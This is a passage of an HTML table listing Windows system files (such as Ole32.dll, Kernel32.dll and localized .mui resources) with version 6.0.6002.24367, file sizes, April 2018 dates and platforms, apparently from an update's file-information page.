applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>19,968</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>19,968</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>8,704</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>02:00</td><td>x64</td><td>Not applicable</td></tr><tr><td>Csrsrv.dll</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>1,215,488</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>220,672</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>152,064</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>60,928</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>234,496</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>165,376</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>71,680</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>230,400</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>156,672</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>66,048</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>250,880</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>160,256</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>71,680</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>278,016</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>187,392</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>74,240</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>224,256</td><td>28-Apr-2018</td><td>02:31</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>02:32</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:33</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>264,704</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>184,320</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>67,584</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>227,840</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>21,504</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>160,768</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>68,608</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>281,600</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>181,248</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>67,584</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>211,456</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>136,192</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>61,440</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>254,464</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>171,008</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>76,288</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>253,440</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>166,912</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>70,656</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>158,720</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>16,384</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,080</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>42,496</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>143,360</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>15,360</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>101,376</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>231,424</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>153,600</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>65,024</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>243,200</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>165,888</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>70,656</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>261,632</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>180,224</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>72,192</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>265,728</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>181,248</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>68,096</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>260,608</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>181,248</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>67,584</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>257,024</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>163,328</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>74,752</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>231,424</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>21,504</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>161,280</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>65,024</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>231,424</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>20,992</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>159,744</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>60,416</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>121,344</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>87,040</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>126,976</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>89,600</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>35,840</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:53</td><td>x64</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>53,760</td><td>28-Apr-2018</td><td>01:58</td><td>x64</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,583,448</td><td>28-Apr-2018</td><td>02:33</td><td>x64</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>862,720</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Ntoskrnl.exe</td><td>6.0.6002.24367</td><td>4,718,272</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>1,308,160</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Spsys.sys</td><td>6.0.6002.24298</td><td>354,816</td><td>23-Feb-2018</td><td>03:26</td><td>x64</td><td>Not applicable</td></tr><tr><td>Smss.exe</td><td>6.0.6002.24367</td><td>76,288</td><td>28-Apr-2018</td><td>01:54</td><td>x64</td><td>Not applicable</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>16,896</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64.dll</td><td>6.0.6002.24367</td><td>234,496</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64cpu.dll</td><td>6.0.6002.24367</td><td>17,408</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64win.dll</td><td>6.0.6002.24367</td><td>301,568</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>7,168</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>01:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>862,720</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,168,840</td><td>28-Apr-2018</td><td>02:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>574,464</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>679,424</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Acwow64.dll</td><td>6.0.6002.24367</td><td>43,520</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Instnm.exe</td><td>6.0.6002.24367</td><td>7,680</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>14,336</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Setup16.exe</td><td>3.1.0.1918</td><td>26,112</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>User.exe</td><td>6.0.6002.24367</td><td>2,560</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow32.dll</td><td>6.0.6002.24367</td><td>5,120</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,928</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>401,408</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>376,832</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>356,352</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>348,160</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>823,808</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>1,321,472</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not 